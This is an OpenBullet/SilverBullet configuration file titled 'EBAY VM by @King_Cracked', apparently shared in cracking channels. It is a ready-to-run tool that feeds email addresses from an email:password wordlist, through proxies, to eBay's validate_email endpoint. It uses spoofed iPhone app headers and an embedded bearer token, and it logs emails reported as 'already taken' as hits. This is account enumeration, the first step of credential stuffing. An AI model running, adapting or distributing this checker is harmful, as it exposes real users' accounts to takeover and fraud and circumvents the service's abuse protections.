[SETTINGS]
{
  "Name": "EBAY VM by @King_Cracked",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-05-26T13:13:58.5398543-07:00",
  "AdditionalInfo": "DISCOD https://discord.gg/6XBbYgPR  /TELEGRAM : https://t.me/Config_list  /https://t.me/OPEN_BUILLET_Configs",
  "RequiredPlugins": [],
  "Author": "@King_Cracked",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "EBAY VM by @King_Cracked",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#VM REQUEST POST "https://apisd.ebay.com/identity/user_onboard/v1/user/validate_email" 
  CONTENT "{\"email\":\"<USER>\",\"reclaimFeatureEnabled\":false}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: apisd.ebay.com" 
  HEADER "User-Agent: eBayiPhone/6.62.0" 
  HEADER "ebay-ets-api-intent: foreground" 
  HEADER "X-EBAY-C-TRACKING: devicetimestamp=2022-05-26T20:09:46.050Z,guid=01fcc2971813ab1c16411ef001729b49" 
  HEADER "X-EBAY-C-TERRITORY-ID: LB" 
  HEADER "Content-Length: 57" 
  HEADER "X-EBAY-C-EXP: c=5,epcalenv=,v=v2,eprlogid=t6fuuq%60%3F%3Ctofcwpse*1wkai%28rbpv6770-18101fccd97-0xec,noepheader=1" 
  HEADER "X-EBAY-C-CORRELATION-SESSION: devicetimestamp=2022-05-26T20:09:46.050Z,si=01fcc2971813ab1c16411ef001729b49" 
  HEADER "X-EBAY-4PP: AQADxGY5fS1IzPekK9dXuoBWJSFgJ4VbPJdf8o2hMFpEDHBsVMdZ8JDIqdD6y4uaKZHu" 
  HEADER "Connection: keep-alive" 
  HEADER "X-EBAY-C-ENDUSERCTX: deviceId=18101fccaca.a9dbde1.7928.ffff3978,deviceIdType=IDREF,userAgent=ebayUserAgent/eBayIOS;6.62.0;iOS;15.4.1;Apple;iPhone10_3;alfa;375x812;3.0" 
  HEADER "Authorization: Bearer v^1.1#i^1#f^0#I^3#r^1#p^1#t^Ul42XzExOjQ4MTBGQ0IwQjBCNEFFMENDMUY5MjY1REI5MzkyQkYyXzBfMSNFXjI2MA==" 
  HEADER "Accept-Language: en-US" 
  HEADER "X-EBAY-C-CULTURAL-PREF: Currency=LBP,Timezone=Asia/Beirut,Units=US" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 
  HEADER "X-EBAY-C-MARKETPLACE-ID: EBAY-US" 
  HEADER "traceparent: 00-c8729cad018e7dc8ee5d142336a938d0-1e097ea366aa614a-00" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "ebay-ets-device-theme: dark" 

#VM KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"emailValid\":false," 
    KEY "Email address is already taken." 
  KEYCHAIN Failure OR 
    KEY "\"emailValid\":true," 

#AUTHOR FUNCTION Constant "@King_Cracked" -> CAP "CONFIGBY" 

